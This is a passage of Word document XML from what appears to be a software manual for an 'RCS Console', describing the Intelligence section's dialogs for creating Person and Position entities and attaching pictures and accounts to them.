    </w:p>
    <w:p w:rsidR="002E5105" w:rsidRDefault="002E5105">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD4038" w:rsidRDefault="00EB3EA6" w:rsidP="00BD4038">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The image</w:t>
      </w:r>
      <w:r w:rsidR="00BD4038">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> below show</w:t>
      </w:r>
      <w:r w:rsidR="00FB2070">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BD4038">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the pop-up window for the creation of a new </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00BD4038">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntity of type Person.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD4038" w:rsidRDefault="00BD4038" w:rsidP="00BD4038">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BD4038" w:rsidTr="00240B6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4957" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00051467" w:rsidRDefault="00051467" w:rsidP="008C7FB1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD4038" w:rsidRPr="0059626D" w:rsidRDefault="0010013A" w:rsidP="0010013A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Intelligence &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; New Entity (Person)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1081" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:237pt;height:141.75pt;z-index:251712512;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId53" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1081" DrawAspect="Content" ObjectID="_1446455343" r:id="rId54"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BD4038" w:rsidRDefault="00BD4038" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BD4038" w:rsidRPr="00240B6F" w:rsidRDefault="00BD4038" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD4038" w:rsidRPr="00240B6F" w:rsidRDefault="00BD4038" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001F3283" w:rsidRPr="00240B6F" w:rsidRDefault="001F3283" w:rsidP="001F3283">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w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001F3283" w:rsidRPr="00240B6F" w:rsidRDefault="001F3283" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to be used for storing additional information</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> about the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD4038" w:rsidRPr="00240B6F" w:rsidRDefault="001F3283" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify which type of </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity you’re about to cr</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>eate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BD4038" w:rsidRDefault="00BD4038" w:rsidP="00BD4038">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41519" w:rsidRDefault="00C41519" w:rsidP="00BD4038">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41519" w:rsidRDefault="00C41519" w:rsidP="00C41519">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the Person </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ntity is created you can access the </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntity page (double-click) providing details such as picture</w:t>
      </w:r>
      <w:r w:rsidR="003C7E2B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and accounts, as shown in the image below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41519" w:rsidRDefault="00C41519" w:rsidP="00C41519">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C41519" w:rsidTr="00240B6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4957" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00051467" w:rsidRDefault="00051467" w:rsidP="008C7FB1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C41519" w:rsidRPr="0059626D" w:rsidRDefault="0010013A" w:rsidP="0010013A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Intelligence &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Entity </w:t>
            </w:r>
            <w:r w:rsidR="00051467" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00051467">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Person)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1084" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:237pt;height:131.25pt;z-index:251718656;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId55" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1084" DrawAspect="Content" ObjectID="_1446455344" r:id="rId56"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C41519" w:rsidRDefault="00C41519" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C41519" w:rsidRPr="00240B6F" w:rsidRDefault="00C41519" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C41519" w:rsidRPr="00240B6F" w:rsidRDefault="00C41519" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C41519" w:rsidRPr="00240B6F" w:rsidRDefault="00C41519" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Account</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ntity’s </w:t>
            </w:r>
            <w:r w:rsidR="00BF5C59" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>account</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C41519" w:rsidRPr="00240B6F" w:rsidRDefault="00C41519" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00BF5C59" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to be used for storing additional information</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> about the </w:t>
            </w:r>
            <w:r w:rsidR="00BF5C59" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>account</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C41519" w:rsidRPr="00240B6F" w:rsidRDefault="00C41519" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify which type of account you’re about to bind to the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002C3F2A" w:rsidRDefault="002C3F2A" w:rsidP="00C41519">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9792B" w:rsidRDefault="00C9792B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C3F2A" w:rsidRDefault="00EB3EA6" w:rsidP="002C3F2A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The image </w:t>
      </w:r>
      <w:r w:rsidR="002C3F2A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>below shows the pop-up window for the creation of a new entity of type Position.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C3F2A" w:rsidRDefault="002C3F2A" w:rsidP="002C3F2A">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D8707E" w:rsidTr="00240B6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4957" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C9792B" w:rsidRDefault="00C9792B" w:rsidP="003C7E2B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D8707E" w:rsidRPr="00057420" w:rsidRDefault="0010013A" w:rsidP="0010013A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
